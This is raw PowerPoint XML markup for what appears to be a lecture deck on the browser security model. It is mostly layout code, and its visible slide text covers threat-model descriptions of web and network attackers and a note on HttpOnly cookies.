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embeddings/oleObject1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  <p:sldMasterId id="2147483750" r:id="rId2"/>
    <p:sldMasterId id="2147483778" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId79"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId80"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="560" r:id="rId4"/>
    <p:sldId id="677" r:id="rId5"/>
    <p:sldId id="668" r:id="rId6"/>
    <p:sldId id="570" r:id="rId7"/>
    <p:sldId id="674" r:id="rId8"/>
    <p:sldId id="675" r:id="rId9"/>
    <p:sldId id="561" r:id="rId10"/>
    <p:sldId id="578" r:id="rId11"/>
    <p:sldId id="562" r:id="rId12"/>
    <p:sldId id="569" r:id="rId13"/>
    <p:sldId id="568" r:id="rId14"/>
    <p:sldId id="679" r:id="rId15"/>
    <p:sldId id="566" r:id="rId16"/>
    <p:sldId id="567" r:id="rId17"/>
    <p:sldId id="656" r:id="rId18"/>
    <p:sldId id="597" r:id="rId19"/>
    <p:sldId id="599" r:id="rId20"/>
    <p:sldId id="600" r:id="rId21"/>
    <p:sldId id="601" r:id="rId22"/>
    <p:sldId id="565" r:id="rId23"/>
    <p:sldId id="588" r:id="rId24"/>
    <p:sldId id="670" r:id="rId25"/>
    <p:sldId id="604" r:id="rId26"/>
    <p:sldId id="678" r:id="rId27"/>
    <p:sldId id="671" r:id="rId28"/>
    <p:sldId id="579" r:id="rId29"/>
    <p:sldId id="598" r:id="rId30"/>
    <p:sldId id="589" r:id="rId31"/>
    <p:sldId id="590" r:id="rId32"/>
    <p:sldId id="587" r:id="rId33"/>
    <p:sldId id="594" r:id="rId34"/>
    <p:sldId id="672" r:id="rId35"/>
    <p:sldId id="603" r:id="rId36"/>
    <p:sldId id="595" r:id="rId37"/>
    <p:sldId id="607" r:id="rId38"/>
    <p:sldId id="563" r:id="rId39"/>
    <p:sldId id="610" r:id="rId40"/>
    <p:sldId id="659" r:id="rId41"/>
    <p:sldId id="564" r:id="rId42"/>
    <p:sldId id="612" r:id="rId43"/>
    <p:sldId id="614" r:id="rId44"/>
    <p:sldId id="615" r:id="rId45"/>
    <p:sldId id="625" r:id="rId46"/>
    <p:sldId id="616" r:id="rId47"/>
    <p:sldId id="617" r:id="rId48"/>
    <p:sldId id="624" r:id="rId49"/>
    <p:sldId id="618" r:id="rId50"/>
    <p:sldId id="619" r:id="rId51"/>
    <p:sldId id="620" r:id="rId52"/>
    <p:sldId id="621" r:id="rId53"/>
    <p:sldId id="622" r:id="rId54"/>
    <p:sldId id="655" r:id="rId55"/>
    <p:sldId id="623" r:id="rId56"/>
    <p:sldId id="626" r:id="rId57"/>
    <p:sldId id="627" r:id="rId58"/>
    <p:sldId id="628" r:id="rId59"/>
    <p:sldId id="629" r:id="rId60"/>
    <p:sldId id="630" r:id="rId61"/>
    <p:sldId id="631" r:id="rId62"/>
    <p:sldId id="644" r:id="rId63"/>
    <p:sldId id="645" r:id="rId64"/>
    <p:sldId id="646" r:id="rId65"/>
    <p:sldId id="647" r:id="rId66"/>
    <p:sldId id="649" r:id="rId67"/>
    <p:sldId id="632" r:id="rId68"/>
    <p:sldId id="633" r:id="rId69"/>
    <p:sldId id="634" r:id="rId70"/>
    <p:sldId id="636" r:id="rId71"/>
    <p:sldId id="637" r:id="rId72"/>
    <p:sldId id="638" r:id="rId73"/>
    <p:sldId id="639" r:id="rId74"/>
    <p:sldId id="640" r:id="rId75"/>
    <p:sldId id="641" r:id="rId76"/>
    <p:sldId id="642" r:id="rId77"/>
    <p:sldId id="657" r:id="rId7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9900"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="808080"/>
    <a:srgbClr val="869406"/>
    <a:srgbClr val="6666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647" autoAdjust="0"/>
    <p:restoredTop sz="94592" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="90" d="100"/>
          <a:sy n="90" d="100"/>
        </p:scale>
        <p:origin x="-792" y="-104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86"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="-1914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slide" Target="slides/slide74.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide75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8D74864-EB05-49AA-BA59-F6F5B3173B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1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0475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6" rIns="96631" bIns="48316" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="966621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35E1360-550A-4529-B4D2-5DC013EF6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1997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defTabSz="963613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BB7810A-5045-442B-95AC-96A1A1E744B7}" type="slidenum">
              <a:rPr lang="en-US" sz="1300" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/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FD1C102-9507-4FA8-81A7-7297927106E6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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D605EE26-1CB0-4E2A-B84D-C747D8E5CCE1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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68ED943-A644-4C17-8A4D-0F3838B180B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="966788"/>
              <a:t>30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673BA8A2-3806-44CB-8868-D0DD35F11572}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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53FFE947-B96B-4BD9-9503-1AFDA9018BFF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"/>
              <a:t>34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6381CE-79EE-4B91-90B2-53CD43D08136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846BF2-BDC9-4A46-8C6B-5725797173F9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50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5DCFB259-B646-486A-8557-3CA54B84E6E7}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>51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Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4143881" y="9119857"/>
            <a:ext cx="3169705" cy="47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1" tIns="48325" rIns="96651" bIns="48325" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{EB7EED29-BC83-4F7A-BF0D-F9A0B1D3E2CF}" type="slidenum">
              <a:rPr lang="en-US" sz="1300"/>
              <a:pPr algn="r"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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1DD2A54E-7F4A-4F8D-A2BF-E3597AA6488F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3"/>
              </a:rPr>
              <a:pPr defTabSz="965200"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ヒラギノ角ゴ ProN W3"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W3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ED8FEA-7778-4676-91F7-45872229C0A7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137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Personalization:  NY Times says “Hi Fred”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EF24E3-66CE-4EAD-839D-070122A087E4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142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CE478-A8F0-4A48-9704-0207FAF3866A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134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HttpOnly in IE can be written to by script, but cannot be read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87D655A4-9836-418D-A32F-B201A5C1FF76}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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D8F60AA1-4A90-48DC-BEF0-CB42F8058452}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200"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5200"/>
            <a:fld id="{6C6A965A-ACD5-4A3F-ADC5-CAF86F6BCB51}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="965200"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B4C7B-B852-4000-BA8B-C9DA288BA792}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17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C24E73DC-F075-4293-9626-6E109DDD83F6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788"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904A546D-4F7E-42A3-A401-2722DE26BA08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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5E55E8C-DFFB-430A-AEF8-5ADB56F4FBCE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="966788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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="16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9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0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1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2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3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4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5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6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7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8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29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0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1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2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3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4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5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6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7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8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39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0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1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2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3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4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5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6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7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8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49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0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2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3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4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5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6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7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8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9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0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1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2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3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4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5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6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7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68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sp>
            <p:nvSpPr>
              <p:cNvPr id="17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6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Arc 1090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69" name="Rectangle 1093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0" name="Rectangle 109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" name="Rectangle 109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020C872-3BC4-4E8F-8435-60B84CF2BB6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9050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990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777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" name="Group 1027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069060" name="Rectangle 1028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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 1029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069062" name="Line 1030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3" name="Line 1031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4" name="Line 1032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5" name="Line 1033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6" name="Line 1034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7" name="Line 1035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8" name="Line 1036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69" name="Line 1037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0" name="Line 1038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1" name="Line 1039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2" name="Line 1040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3" name="Line 1041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4" name="Line 1042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5" name="Line 1043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6" name="Line 1044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7" name="Line 1045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8" name="Line 1046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79" name="Line 1047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0" name="Line 1048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1" name="Line 1049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2" name="Line 1050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3" name="Line 1051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4" name="Line 1052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5" name="Line 1053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6" name="Line 1054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7" name="Line 1055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8" name="Line 1056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89" name="Line 1057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0" name="Line 1058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1" name="Line 1059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2" name="Line 1060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3" name="Line 1061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4" name="Line 1062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5" name="Line 1063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6" name="Line 1064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7" name="Line 1065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8" name="Line 1066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099" name="Line 1067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0" name="Line 1068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1" name="Line 1069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2" name="Line 1070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3" name="Line 1071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4" name="Line 1072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5" name="Line 1073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6" name="Line 1074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7" name="Line 1075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8" name="Line 1076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09" name="Line 1077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0" name="Line 1078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1" name="Line 1079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9112" name="Line 1080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sp>
            <p:nvSpPr>
              <p:cNvPr id="1069113" name="Line 1081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5" name="Group 1082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069115" name="Line 1083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6" name="Line 1084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7" name="Line 1085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18" name="Arc 108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  <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 1087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1069120" name="Line 1088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1" name="Line 1089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9122" name="Arc 1090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9123" name="Rectangle 1091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69124" name="Rectangle 1092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69125" name="Rectangle 1093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6" name="Rectangle 10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smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069127" name="Rectangle 10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E448B4-4CCC-4564-AAC6-8BAFB71823A3}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C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04800"/>
            <a:ext cx="205740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601980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524000"/>
            <a:ext cx="39243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39.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3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05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060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  <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2061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5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2051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2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806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0" y="-76200"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="576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4" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68037" name="Line 5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8" name="Line 6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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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  <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"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68060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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8" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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0" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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1" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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2" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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3" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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4" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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5" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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6" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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7" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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  <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068088" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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mtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="40458C"/>
                    </a:solidFill>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"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sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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3" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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mtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068095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68096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5240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w3schools.com/js/js_output.asp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hyperlink" Target="http://www.w3schools.com/js/js_output.asp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3.jpe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de.google.com/p/browsersec/wiki/Part1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/p/browsersec/wiki/Part2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41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42.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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41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42.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/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42.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId7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5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8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Browser Security Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4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309938"/>
            <a:ext cx="5410200" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>*original slides by prof. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>John </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Mitchell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905000"/>
            <a:ext cx="8753475" cy="4762500"/>
            <a:chOff x="228600" y="1905000"/>
            <a:chExt cx="8753475" cy="4762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339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0" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5638800" y="1981200"/>
              <a:ext cx="533400" cy="2000250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4341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3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2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4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3" name="TextBox 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6705600" y="4286250"/>
              <a:ext cx="2276475" cy="1938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/>
                <a:t>Web Attacker</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Sets up malicious site visited by victim; no control of network</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14344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4345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6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7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48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4349" name="Picture 11" descr="CompaqAlphaServerES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00600" y="2228850"/>
              <a:ext cx="1155700" cy="142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50" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3184525" y="2619375"/>
              <a:ext cx="1001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sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Cloud Callout 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3981450"/>
              <a:ext cx="1155700" cy="1276350"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -186846"/>
                <a:gd name="adj2" fmla="val 43949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4352" name="Straight Connector 33"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="30" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="4919662" y="3748088"/>
              <a:ext cx="492125" cy="1206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4353" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4256088" y="4743450"/>
              <a:ext cx="457200" cy="1714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14354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 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security threat model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8600" y="1905000"/>
            <a:ext cx="8839200" cy="4762500"/>
            <a:chOff x="228600" y="1905000"/>
            <a:chExt cx="8839200" cy="4762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3315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16" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5638800" y="1976438"/>
              <a:ext cx="533400" cy="2157412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3317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3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8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4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9" name="TextBox 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6927850" y="4286250"/>
              <a:ext cx="2139950" cy="163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Network Attacker</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Intercepts and controls network communication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13320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3321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2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3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4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3325" name="Picture 11" descr="CompaqAlphaServerES4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6600" y="2255838"/>
              <a:ext cx="1155700" cy="142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26" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4954588" y="4743450"/>
              <a:ext cx="1001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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13327" name="Straight Connector 33"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="4432300" y="2967038"/>
              <a:ext cx="488950" cy="303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28" name="Straight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4242594" y="3899694"/>
              <a:ext cx="1028700" cy="10017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2" name="Cloud Callout 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
